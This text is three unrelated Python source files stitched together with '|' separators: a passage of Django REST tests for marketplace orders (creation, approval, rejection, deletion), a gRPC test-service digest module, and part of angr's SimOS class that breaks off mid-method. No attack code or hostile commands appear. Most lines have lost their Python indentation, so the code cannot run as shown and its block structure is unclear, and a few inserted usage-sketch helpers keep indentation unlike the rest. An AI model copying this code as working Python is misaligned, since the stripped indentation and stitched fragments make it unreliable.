self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def test_user_can_create_order_if_terms_of_service_are_not_filled(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def test_user_can_create_order_if_offering_is_not_shared(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
offering.shared = False
offering.customer = self.project.customer
offering.save()
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def test_user_cannot_create_order_if_terms_of_service_have_been_not_accepted(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
offering.terms_of_service = 'Terms of service'
offering.save()
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
str(response.content, 'utf-8'),
'{"items":["Terms of service for offering \'%s\' have not been accepted."]}'
% offering,
)
self.assertFalse(models.Order.objects.filter(created_by=user).exists())
def test_user_cannot_create_order_if_project_is_expired(self):
user = self.fixture.staff
self.project.end_date = datetime.datetime(day=1, month=1, year=2020)
self.project.save()
with freeze_time('2020-01-01'):
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_if_divisions_do_not_match_order_validation_fails(self):
user = self.fixture.staff
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
division = structure_factories.DivisionFactory()
offering.divisions.add(division)
response = self.create_order(user, offering)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_if_divisions_match_order_validation_passes(self):
user = self.fixture.staff
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
division = structure_factories.DivisionFactory()
offering.divisions.add(division)
self.fixture.customer.division = division
self.fixture.customer.save()
response = self.create_order(user, offering)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def create_order(self, user, offering=None, add_payload=None):
if offering is None:
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_list_url()
payload = {
'project': structure_factories.ProjectFactory.get_url(self.project),
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
],
}
if add_payload:
payload.update(add_payload)
return self.client.post(url, payload)
@ddt
class OrderApproveTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
self.url = factories.OrderFactory.get_url(self.order, 'approve')
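# By default the project manager and admin cannot approve an order (the
# owner can); the MANAGER_CAN_APPROVE_ORDER / ADMIN_CAN_APPROVE_ORDER
# settings exercised below enable them to.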
def test_owner_can_approve_order(self):
self.ensure_user_can_approve_order(self.fixture.owner)
def test_by_default_manager_can_not_approve_order(self):
self.ensure_user_can_not_approve_order(self.fixture.manager)
def test_by_default_admin_can_not_approve_order(self):
self.ensure_user_can_not_approve_order(self.fixture.admin)
@override_marketplace_settings(MANAGER_CAN_APPROVE_ORDER=True)
def test_manager_can_approve_order_if_feature_is_enabled(self):
self.ensure_user_can_approve_order(self.fixture.manager)
@override_marketplace_settings(ADMIN_CAN_APPROVE_ORDER=True)
def test_admin_can_approve_order_if_feature_is_enabled(self):
self.ensure_user_can_approve_order(self.fixture.admin)
def test_user_can_not_reapprove_active_order(self):
self.order.state = models.Order.States.EXECUTING
self.order.save()
response = self.approve_order(self.fixture.owner)
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
self.assertEqual(self.order.approved_by, None)
def test_order_approving_is_not_available_for_blocked_organization(self):
self.order.project.customer.blocked = True
self.order.project.customer.save()
response = self.approve_order(self.fixture.owner)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@mock.patch('waldur_mastermind.marketplace.tasks.process_order.delay')
def test_when_order_with_basic_offering_is_approved_resource_is_marked_as_ok(
self, mocked_delay
):
mocked_delay.side_effect = process_order
offering = factories.OfferingFactory(
customer=self.fixture.customer, type='Marketplace.Basic'
)
order_item = factories.OrderItemFactory(offering=offering, order=self.order)
self.approve_order(self.fixture.owner)
order_item.refresh_from_db()
self.assertEqual(order_item.resource.state, models.Resource.States.OK)
def test_user_cannot_approve_order_if_project_is_expired(self):
self.project.end_date = datetime.datetime(year=2020, month=1, day=1).date()
self.project.save()
with freeze_time('2020-01-01'):
response = self.approve_order(self.fixture.staff)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def approve_order(self, user):
self.client.force_authenticate(user)
response = self.client.post(self.url)
self.order.refresh_from_db()
return response
def ensure_user_can_approve_order(self, user):
response = self.approve_order(user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.order.approved_by, user)
def ensure_user_can_not_approve_order(self, user):
response = self.approve_order(user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.order.approved_by, None)
@ddt
class OrderRejectTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
self.order_item_1 = factories.OrderItemFactory(order=self.order)
self.order_item_2 = factories.OrderItemFactory(order=self.order)
self.url = factories.OrderFactory.get_url(self.order, 'reject')
@data('staff', 'manager', 'admin', 'owner')
def test_authorized_user_can_reject_order(self, user):
self.client.force_authenticate(getattr(self.fixture, user))
response = self.client.post(self.url)
for obj in [self.order, self.order_item_1, self.order_item_2]:
obj.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.order.state, models.Order.States.REJECTED)
self.assertEqual(self.order_item_1.state, models.OrderItem.States.TERMINATED)
self.assertEqual(self.order_item_2.state, models.OrderItem.States.TERMINATED)
def test_support_users_can_not_reject_order(self):
self.client.force_authenticate(self.fixture.global_support)
response = self.client.post(self.url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_can_not_reject_unrequested_order(self):
self.client.force_authenticate(self.fixture.staff)
self.order.approve()
self.order.save()
response = self.client.post(self.url)
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
def test_order_rejecting_is_not_available_for_blocked_organization(self):
self.order.project.customer.blocked = True
self.order.project.customer.save()
self.client.force_authenticate(self.fixture.manager)
response = self.client.post(self.url)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@ddt
class OrderDeleteTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
@data('staff', 'owner')
def test_owner_and_staff_can_delete_order(self, user):
response = self.delete_order(user)
self.assertEqual(
response.status_code, status.HTTP_204_NO_CONTENT, response.data
)
self.assertFalse(models.Order.objects.filter(created_by=self.manager).exists())
@data('admin', 'manager')
def test_other_colleagues_can_not_delete_order(self, user):
response = self.delete_order(user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(models.Order.objects.filter(created_by=self.manager).exists())
@data('user')
def test_other_user_can_not_delete_order(self, user):
response = self.delete_order(user)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertTrue(models.Order.objects.filter(created_by=self.manager).exists())
def test_order_deleting_is_not_available_for_blocked_organization(self):
self.fixture.customer.blocked = True
self.fixture.customer.save()
response = self.delete_order('owner')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def delete_order(self, user):
user = getattr(self.fixture, user)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_url(self.order)
response = self.client.delete(url)
return response
class OrderStateTest(test.APITransactionTestCase):
def test_switch_order_state_to_done_when_all_order_items_are_processed(self):
order_item = factories.OrderItemFactory(state=models.OrderItem.States.EXECUTING)
order = order_item.order
order.state = models.Order.States.EXECUTING
order.save()
order_item.state = models.OrderItem.States.DONE
order_item.save()
order.refresh_from_db()
self.assertEqual(order.state, models.Order.States.DONE)
    def test_does_not_switch_order_state_to_done_when_not_all_order_items_are_processed(
        self,
    ):
order_item = factories.OrderItemFactory(state=models.OrderItem.States.EXECUTING)
order = order_item.order
factories.OrderItemFactory(state=models.OrderItem.States.EXECUTING, order=order)
order.state = models.Order.States.EXECUTING
order.save()
order_item.state = models.OrderItem.States.DONE
order_item.save()
order.refresh_from_db()
self.assertEqual(order.state, models.Order.States.EXECUTING)
|
|
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Code for making a service.TestService more amenable to use in tests."""
import collections
import threading
import six
# test_control, _service, and test_interfaces are referenced from specification
# in this module.
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import stream
from grpc.framework.foundation import stream_util
from grpc.framework.interfaces.face import face
from tests.unit.framework.common import test_control # pylint: disable=unused-import
from tests.unit.framework.interfaces.face import _service # pylint: disable=unused-import
from tests.unit.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
_IDENTITY = lambda x: x
class TestServiceDigest(
collections.namedtuple('TestServiceDigest', (
'methods', 'inline_method_implementations',
'event_method_implementations', 'multi_method_implementation',
'unary_unary_messages_sequences', 'unary_stream_messages_sequences',
'stream_unary_messages_sequences',
'stream_stream_messages_sequences',))):
"""A transformation of a service.TestService.
Attributes:
methods: A dict from method group-name pair to test_interfaces.Method object
describing the RPC methods that may be called during the test.
inline_method_implementations: A dict from method group-name pair to
face.MethodImplementation object to be used in tests of in-line calls to
behaviors under test.
event_method_implementations: A dict from method group-name pair to
face.MethodImplementation object to be used in tests of event-driven calls
to behaviors under test.
multi_method_implementation: A face.MultiMethodImplementation to be used in
tests of generic calls to behaviors under test.
unary_unary_messages_sequences: A dict from method group-name pair to
sequence of service.UnaryUnaryTestMessages objects to be used to test the
identified method.
unary_stream_messages_sequences: A dict from method group-name pair to
sequence of service.UnaryStreamTestMessages objects to be used to test the
identified method.
stream_unary_messages_sequences: A dict from method group-name pair to
sequence of service.StreamUnaryTestMessages objects to be used to test the
identified method.
stream_stream_messages_sequences: A dict from method group-name pair to
sequence of service.StreamStreamTestMessages objects to be used to test
the identified method.
"""
class _BufferingConsumer(stream.Consumer):
"""A trivial Consumer that dumps what it consumes in a user-mutable buffer."""
def __init__(self):
self.consumed = []
self.terminated = False
def consume(self, value):
self.consumed.append(value)
def terminate(self):
self.terminated = True
def consume_and_terminate(self, value):
self.consumed.append(value)
self.terminated = True
class _InlineUnaryUnaryMethod(face.MethodImplementation):
def __init__(self, unary_unary_test_method, control):
self._test_method = unary_unary_test_method
self._control = control
self.cardinality = cardinality.Cardinality.UNARY_UNARY
self.style = style.Service.INLINE
def unary_unary_inline(self, request, context):
response_list = []
self._test_method.service(request, response_list.append, context,
self._control)
return response_list.pop(0)
class _EventUnaryUnaryMethod(face.MethodImplementation):
def __init__(self, unary_unary_test_method, control, pool):
self._test_method = unary_unary_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.UNARY_UNARY
self.style = style.Service.EVENT
def unary_unary_event(self, request, response_callback, context):
if self._pool is None:
self._test_method.service(request, response_callback, context,
self._control)
else:
self._pool.submit(self._test_method.service, request,
response_callback, context, self._control)
class _InlineUnaryStreamMethod(face.MethodImplementation):
def __init__(self, unary_stream_test_method, control):
self._test_method = unary_stream_test_method
self._control = control
self.cardinality = cardinality.Cardinality.UNARY_STREAM
self.style = style.Service.INLINE
def unary_stream_inline(self, request, context):
response_consumer = _BufferingConsumer()
self._test_method.service(request, response_consumer, context,
self._control)
for response in response_consumer.consumed:
yield response
class _EventUnaryStreamMethod(face.MethodImplementation):
def __init__(self, unary_stream_test_method, control, pool):
self._test_method = unary_stream_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.UNARY_STREAM
self.style = style.Service.EVENT
def unary_stream_event(self, request, response_consumer, context):
if self._pool is None:
self._test_method.service(request, response_consumer, context,
self._control)
else:
self._pool.submit(self._test_method.service, request,
response_consumer, context, self._control)
class _InlineStreamUnaryMethod(face.MethodImplementation):
def __init__(self, stream_unary_test_method, control):
self._test_method = stream_unary_test_method
self._control = control
self.cardinality = cardinality.Cardinality.STREAM_UNARY
self.style = style.Service.INLINE
def stream_unary_inline(self, request_iterator, context):
response_list = []
request_consumer = self._test_method.service(response_list.append,
context, self._control)
for request in request_iterator:
request_consumer.consume(request)
request_consumer.terminate()
return response_list.pop(0)
class _EventStreamUnaryMethod(face.MethodImplementation):
def __init__(self, stream_unary_test_method, control, pool):
self._test_method = stream_unary_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.STREAM_UNARY
self.style = style.Service.EVENT
def stream_unary_event(self, response_callback, context):
request_consumer = self._test_method.service(response_callback, context,
self._control)
if self._pool is None:
return request_consumer
else:
return stream_util.ThreadSwitchingConsumer(request_consumer,
self._pool)
class _InlineStreamStreamMethod(face.MethodImplementation):
def __init__(self, stream_stream_test_method, control):
self._test_method = stream_stream_test_method
self._control = control
self.cardinality = cardinality.Cardinality.STREAM_STREAM
self.style = style.Service.INLINE
def stream_stream_inline(self, request_iterator, context):
response_consumer = _BufferingConsumer()
request_consumer = self._test_method.service(response_consumer, context,
self._control)
for request in request_iterator:
request_consumer.consume(request)
while response_consumer.consumed:
yield response_consumer.consumed.pop(0)
response_consumer.terminate()
class _EventStreamStreamMethod(face.MethodImplementation):
def __init__(self, stream_stream_test_method, control, pool):
self._test_method = stream_stream_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.STREAM_STREAM
self.style = style.Service.EVENT
def stream_stream_event(self, response_consumer, context):
request_consumer = self._test_method.service(response_consumer, context,
self._control)
if self._pool is None:
return request_consumer
else:
return stream_util.ThreadSwitchingConsumer(request_consumer,
self._pool)
class _UnaryConsumer(stream.Consumer):
"""A Consumer that only allows consumption of exactly one value."""
def __init__(self, action):
self._lock = threading.Lock()
self._action = action
self._consumed = False
self._terminated = False
def consume(self, value):
with self._lock:
if self._consumed:
raise ValueError('Unary consumer already consumed!')
elif self._terminated:
raise ValueError('Unary consumer already terminated!')
else:
self._consumed = True
self._action(value)
def terminate(self):
with self._lock:
if not self._consumed:
raise ValueError('Unary consumer hasn\'t yet consumed!')
elif self._terminated:
raise ValueError('Unary consumer already terminated!')
else:
self._terminated = True
def consume_and_terminate(self, value):
with self._lock:
if self._consumed:
raise ValueError('Unary consumer already consumed!')
elif self._terminated:
raise ValueError('Unary consumer already terminated!')
else:
self._consumed = True
self._terminated = True
self._action(value)
class _UnaryUnaryAdaptation(object):
def __init__(self, unary_unary_test_method):
self._method = unary_unary_test_method
def service(self, response_consumer, context, control):
def action(request):
self._method.service(request,
response_consumer.consume_and_terminate,
context, control)
return _UnaryConsumer(action)
class _UnaryStreamAdaptation(object):
def __init__(self, unary_stream_test_method):
self._method = unary_stream_test_method
def service(self, response_consumer, context, control):
def action(request):
self._method.service(request, response_consumer, context, control)
return _UnaryConsumer(action)
class _StreamUnaryAdaptation(object):
def __init__(self, stream_unary_test_method):
self._method = stream_unary_test_method
def service(self, response_consumer, context, control):
return self._method.service(response_consumer.consume_and_terminate,
context, control)
class _MultiMethodImplementation(face.MultiMethodImplementation):
def __init__(self, methods, control, pool):
self._methods = methods
self._control = control
self._pool = pool
def service(self, group, name, response_consumer, context):
method = self._methods.get(group, name, None)
if method is None:
raise face.NoSuchMethodError(group, name)
elif self._pool is None:
return method(response_consumer, context, self._control)
else:
request_consumer = method(response_consumer, context, self._control)
return stream_util.ThreadSwitchingConsumer(request_consumer,
self._pool)
class _Assembly(
collections.namedtuple(
'_Assembly',
['methods', 'inlines', 'events', 'adaptations', 'messages'])):
"""An intermediate structure created when creating a TestServiceDigest."""
def _assemble(scenarios, identifiers, inline_method_constructor,
event_method_constructor, adapter, control, pool):
"""Creates an _Assembly from the given scenarios."""
methods = {}
inlines = {}
events = {}
adaptations = {}
messages = {}
for identifier, scenario in six.iteritems(scenarios):
if identifier in identifiers:
raise ValueError('Repeated identifier "(%s, %s)"!' % identifier)
test_method = scenario[0]
inline_method = inline_method_constructor(test_method, control)
event_method = event_method_constructor(test_method, control, pool)
adaptation = adapter(test_method)
methods[identifier] = test_method
inlines[identifier] = inline_method
events[identifier] = event_method
adaptations[identifier] = adaptation
messages[identifier] = scenario[1]
return _Assembly(methods, inlines, events, adaptations, messages)
def digest(service, control, pool):
"""Creates a TestServiceDigest from a TestService.
Args:
service: A _service.TestService.
control: A test_control.Control.
pool: If RPC methods should be serviced in a separate thread, a thread pool.
None if RPC methods should be serviced in the thread belonging to the
run-time that calls for their service.
Returns:
A TestServiceDigest synthesized from the given service.TestService.
"""
identifiers = set()
unary_unary = _assemble(service.unary_unary_scenarios(), identifiers,
_InlineUnaryUnaryMethod, _EventUnaryUnaryMethod,
_UnaryUnaryAdaptation, control, pool)
identifiers.update(unary_unary.inlines)
unary_stream = _assemble(service.unary_stream_scenarios(), identifiers,
_InlineUnaryStreamMethod, _EventUnaryStreamMethod,
_UnaryStreamAdaptation, control, pool)
identifiers.update(unary_stream.inlines)
stream_unary = _assemble(service.stream_unary_scenarios(), identifiers,
_InlineStreamUnaryMethod, _EventStreamUnaryMethod,
_StreamUnaryAdaptation, control, pool)
identifiers.update(stream_unary.inlines)
stream_stream = _assemble(service.stream_stream_scenarios(), identifiers,
_InlineStreamStreamMethod,
_EventStreamStreamMethod, _IDENTITY, control,
pool)
identifiers.update(stream_stream.inlines)
methods = dict(unary_unary.methods)
methods.update(unary_stream.methods)
methods.update(stream_unary.methods)
methods.update(stream_stream.methods)
adaptations = dict(unary_unary.adaptations)
adaptations.update(unary_stream.adaptations)
adaptations.update(stream_unary.adaptations)
adaptations.update(stream_stream.adaptations)
inlines = dict(unary_unary.inlines)
inlines.update(unary_stream.inlines)
inlines.update(stream_unary.inlines)
inlines.update(stream_stream.inlines)
events = dict(unary_unary.events)
events.update(unary_stream.events)
events.update(stream_unary.events)
events.update(stream_stream.events)
return TestServiceDigest(
methods, inlines, events,
_MultiMethodImplementation(adaptations, control, pool),
unary_unary.messages, unary_stream.messages, stream_unary.messages,
stream_stream.messages)
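# A hedged usage sketch for digest(): the service, control and pool arguments are
# assumed to be supplied by the test harness (a _service.TestService, a
# test_control.Control and an optional thread pool, as documented above).
def _example_digest_usage(service, control, pool=None):
    # Illustrative only: build the digest and list the RPC methods it describes.
    service_digest = digest(service, control, pool)
    return sorted(service_digest.methods.keys())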
|
|
"""
Manage OS-level configuration.
"""
import os
import logging
from collections import defaultdict
from archinfo import ArchARM, ArchMIPS32, ArchMIPS64, ArchX86, ArchAMD64, ArchPPC32, ArchPPC64, ArchAArch64
from cle import MetaELF, BackedCGC
from cle.address_translator import AT
import claripy
from .errors import (
AngrUnsupportedSyscallError,
AngrCallableError,
AngrCallableMultistateError,
AngrSimOSError,
SimUnsupportedError,
SimSegfaultError,
)
from .tablespecs import StringTableSpec
from .sim_state import SimState
from .state_plugins import SimStateSystem, SimActionData
from .calling_conventions import DEFAULT_CC, SYSCALL_CC
from .procedures import SIM_PROCEDURES as P, SIM_LIBRARIES as L
from . import sim_options as o
l = logging.getLogger("angr.simos")
class IRange(object):
"""
A simple range object for testing inclusion. Like xrange but works for huge numbers.
"""
__slots__ = ('start', 'end')
def __init__(self, start, end):
self.start = start
self.end = end
def __contains__(self, k):
if type(k) in (int, long):
return k >= self.start and k < self.end
return False
def __getstate__(self):
return self.start, self.end
def __setstate__(self, state):
self.start, self.end = state
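# A tiny sketch of IRange's half-open containment semantics (start inclusive, end
# exclusive, non-integers never contained), matching __contains__ above.
def _example_irange_usage():
    preapproved = IRange(0x7ffe0000, 0x80000000)
    # Expected results: (True, False, False)
    return (0x7ffe0000 in preapproved, 0x80000000 in preapproved, 'sp' in preapproved)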
class SimOS(object):
"""
A class describing OS/arch-level configuration.
"""
def __init__(self, project, name=None):
self.arch = project.arch
self.project = project
self.name = name
self.return_deadend = None
def configure_project(self):
"""
Configure the project to set up global settings (like SimProcedures).
"""
self.return_deadend = self.project.loader.extern_object.allocate()
self.project.hook(self.return_deadend, P['stubs']['CallReturn']())
def irelative_resolver(resolver_addr):
# autohooking runs before this does, might have provided this already
if self.project.is_hooked(resolver_addr):
return
resolver = self.project.factory.callable(resolver_addr, concrete_only=True)
try:
val = resolver()
except AngrCallableMultistateError:
l.error("Resolver at %#x failed to resolve! (multivalued)", resolver_addr)
return None
except AngrCallableError:
l.error("Resolver at %#x failed to resolve!", resolver_addr)
return None
return val._model_concrete.value
self.project.loader.perform_irelative_relocs(irelative_resolver)
def _weak_hook_symbol(self, name, hook, scope=None):
if scope is None:
sym = self.project.loader.find_symbol(name)
else:
sym = scope.get_symbol(name)
if sym is not None:
if self.project.is_hooked(sym.rebased_addr):
if not self.project.hooked_by(sym.rebased_addr).is_stub:
return
self.project.hook(sym.rebased_addr, hook)
def state_blank(self, addr=None, initial_prefix=None, stack_size=1024*1024*8, **kwargs):
"""
Initialize a blank state.
All parameters are optional.
:param addr: The execution start address.
:param initial_prefix:
:param stack_size: The number of bytes to allocate for stack space
:return: The initialized SimState.
Any additional arguments will be passed to the SimState constructor
"""
# TODO: move ALL of this into the SimState constructor
if kwargs.get('mode', None) is None:
kwargs['mode'] = self.project._default_analysis_mode
if kwargs.get('permissions_backer', None) is None:
# just a dict of address ranges to permission bits
permission_map = { }
for obj in self.project.loader.all_objects:
for seg in obj.segments:
perms = 0
# bit values based off of protection bit values from sys/mman.h
if seg.is_readable:
perms |= 1 # PROT_READ
if seg.is_writable:
perms |= 2 # PROT_WRITE
if seg.is_executable:
perms |= 4 # PROT_EXEC
permission_map[(seg.min_addr, seg.max_addr)] = perms
permissions_backer = (self.project.loader.main_object.execstack, permission_map)
kwargs['permissions_backer'] = permissions_backer
if kwargs.get('memory_backer', None) is None:
kwargs['memory_backer'] = self.project.loader.memory
if kwargs.get('os_name', None) is None:
kwargs['os_name'] = self.name
state = SimState(self.project, **kwargs)
stack_end = state.arch.initial_sp
if o.ABSTRACT_MEMORY not in state.options:
state.memory.mem._preapproved_stack = IRange(stack_end - stack_size, stack_end)
if o.INITIALIZE_ZERO_REGISTERS in state.options:
highest_reg_offset, reg_size = max(state.arch.registers.values())
for i in range(0, highest_reg_offset + reg_size, state.arch.bytes):
state.registers.store(i, state.se.BVV(0, state.arch.bits))
if state.arch.sp_offset is not None:
state.regs.sp = stack_end
if initial_prefix is not None:
for reg in state.arch.default_symbolic_registers:
state.registers.store(reg, claripy.BVS(initial_prefix + "_" + reg,
state.arch.bits,
explicit_name=True))
for reg, val, is_addr, mem_region in state.arch.default_register_values:
region_base = None # so pycharm does not complain
if is_addr:
if isinstance(mem_region, tuple):
# unpack it
mem_region, region_base = mem_region
elif mem_region == 'global':
# Backward compatibility
region_base = 0
else:
raise AngrSimOSError('You must specify the base address for memory region "%s". ' % mem_region)
if o.ABSTRACT_MEMORY in state.options and is_addr:
address = claripy.ValueSet(state.arch.bits, mem_region, region_base, val)
state.registers.store(reg, address)
else:
state.registers.store(reg, val)
if addr is None: addr = self.project.entry
state.regs.ip = addr
# set up the "root history" node
state.scratch.ins_addr = addr
state.scratch.bbl_addr = addr
state.scratch.stmt_idx = 0
state.history.jumpkind = 'Ijk_Boring'
return state
def state_entry(self, **kwargs):
return self.state_blank(**kwargs)
def state_full_init(self, **kwargs):
return self.state_entry(**kwargs)
def state_call(self, addr, *args, **kwargs):
cc = kwargs.pop('cc', DEFAULT_CC[self.arch.name](self.project.arch))
state = kwargs.pop('base_state', None)
toc = kwargs.pop('toc', None)
ret_addr = kwargs.pop('ret_addr', self.return_deadend)
stack_base = kwargs.pop('stack_base', None)
alloc_base = kwargs.pop('alloc_base', None)
grow_like_stack = kwargs.pop('grow_like_stack', True)
if state is None:
state = self.state_blank(addr=addr, **kwargs)
else:
state = state.copy()
state.regs.ip = addr
cc.setup_callsite(state, ret_addr, args, stack_base, alloc_base, grow_like_stack)
if state.arch.name == 'PPC64' and toc is not None:
state.regs.r2 = toc
return state
def prepare_call_state(self, calling_state, initial_state=None,
preserve_registers=(), preserve_memory=()):
"""
This function prepares a state that is executing a call instruction.
If given an initial_state, it copies over all of the critical registers to it from the
calling_state. Otherwise, it prepares the calling_state for action.
        This is mostly used to create minimalistic states for CFG generation. Some ABIs, such as MIPS PIE and
        x86 PIE, require certain information to be maintained in certain registers. For example, for
        PIE MIPS, this function transfers t9, gp, and ra to the new state.
"""
if isinstance(self.arch, ArchMIPS32):
if initial_state is not None:
initial_state = self.state_blank()
mips_caller_saves = ('s0', 's1', 's2', 's3', 's4', 's5', 's6', 's7', 'gp', 'sp', 'bp', 'ra')
preserve_registers = preserve_registers + mips_caller_saves + ('t9',)
if initial_state is None:
new_state = calling_state.copy()
else:
new_state = initial_state.copy()
for reg in set(preserve_registers):
new_state.registers.store(reg, calling_state.registers.load(reg))
for addr, val in set(preserve_memory):
new_state.memory.store(addr, calling_state.memory.load(addr, val))
return new_state
def prepare_function_symbol(self, symbol_name, basic_addr=None):
"""
Prepare the address space with the data necessary to perform relocations pointing to the given symbol
Returns a 2-tuple. The first item is the address of the function code, the second is the address of the
relocation target.
"""
if basic_addr is None:
basic_addr = self.project.loader.extern_object.get_pseudo_addr(symbol_name)
return basic_addr, basic_addr
def handle_exception(self, successors, engine, exc_type, exc_value, exc_traceback):
"""
Perform exception handling. This method will be called when, during execution, a SimException is thrown.
Currently, this can only indicate a segfault, but in the future it could indicate any unexpected exceptional
behavior that can't be handled by ordinary control flow.
The method may mutate the provided SimSuccessors object in any way it likes, or re-raise the exception.
:param successors: The SimSuccessors object currently being executed on
:param engine: The engine that was processing this step
:param exc_type: The value of sys.exc_info()[0] from the error, the type of the exception that was raised
:param exc_value: The value of sys.exc_info()[1] from the error, the actual exception object
:param exc_traceback: The value of sys.exc_info()[2] from the error, the traceback from the exception
"""
raise exc_type, exc_value, exc_traceback
# Dummy stuff to allow this API to be used freely
# pylint: disable=unused-argument, no-self-use
def syscall(self, state, allow_unsupported=True):
return None
def is_syscall_addr(self, addr):
return False
def syscall_from_addr(self, addr, allow_unsupported=True):
return None
def syscall_from_number(self, number, allow_unsupported=True):
return None
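# A minimal sketch of driving the state factories defined above. The simos argument is
# assumed to be an already-configured SimOS (or subclass) instance; in practice these
# calls are usually reached through the owning project's factory rather than directly.
def _example_simos_states(simos, call_addr, *call_args):
    # Illustrative only: a blank state at the default entry point, plus a call state
    # set up to invoke call_addr with call_args and return to the CallReturn stub.
    blank = simos.state_blank()
    call = simos.state_call(call_addr, *call_args, base_state=blank)
    return blank, call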
class SimUserland(SimOS):
"""
This is a base class for any SimOS that wants to support syscalls.
It uses the CLE kernel object to provide addresses for syscalls. Syscalls will be emulated as a jump to one of these
addresses, where a SimProcedure from the syscall library provided at construction time will be executed.
"""
def __init__(self, project, syscall_library=None, **kwargs):
super(SimUserland, self).__init__(project, **kwargs)
self.syscall_library = syscall_library
self.kernel_base = None
def configure_project(self):
super(SimUserland, self).configure_project()
self.kernel_base = self.project.loader.kernel_object.mapped_base
def syscall(self, state, allow_unsupported=True):
"""
Given a state, return the procedure corresponding to the current syscall.
This procedure will have .syscall_number, .display_name, and .addr set.
:param state: The state to get the syscall number from
        :param allow_unsupported: Whether to return a "dummy" syscall instead of raising an unsupported exception
"""
if state.os_name in SYSCALL_CC[state.arch.name]:
cc = SYSCALL_CC[state.arch.name][state.os_name](state.arch)
else:
# Use the default syscall calling convention - it may bring problems
cc = SYSCALL_CC[state.arch.name]['default'](state.arch)
sym_num = cc.syscall_num(state)
possible = state.solver.eval_upto(sym_num, 2)
if len(possible) == 0:
raise AngrUnsupportedSyscallError("The program state is not satisfiable")
elif len(possible) == 1:
num = possible[0]
elif allow_unsupported:
num = self.syscall_library.maximum_syscall_number(self.arch.name) + 1 if self.syscall_library else 0
else:
raise AngrUnsupportedSyscallError("Got a symbolic syscall number")
proc = self.syscall_from_number(num, allow_unsupported=allow_unsupported)
proc.cc = cc
return proc
def is_syscall_addr(self, addr):
"""
Return whether or not the given address corresponds to a syscall.
"""
if self.kernel_base is None:
return False
addr -= self.kernel_base
return 0 <= addr < 0x4000 # TODO: make this number come from somewhere
def syscall_from_addr(self, addr, allow_unsupported=True):
"""
Get a syscall SimProcedure from an address.
:param addr: The address to convert to a syscall SimProcedure
:param allow_unsupported: Whether to return a dummy procedure for an unsupported syscall instead of raising an
exception.
:return: The SimProcedure for the syscall, or None if the address is not a syscall address.
"""
if not self.is_syscall_addr(addr):
return None
number = addr - self.kernel_base
return self.syscall_from_number(number, allow_unsupported=allow_unsupported)
def syscall_from_number(self, number, allow_unsupported=True):
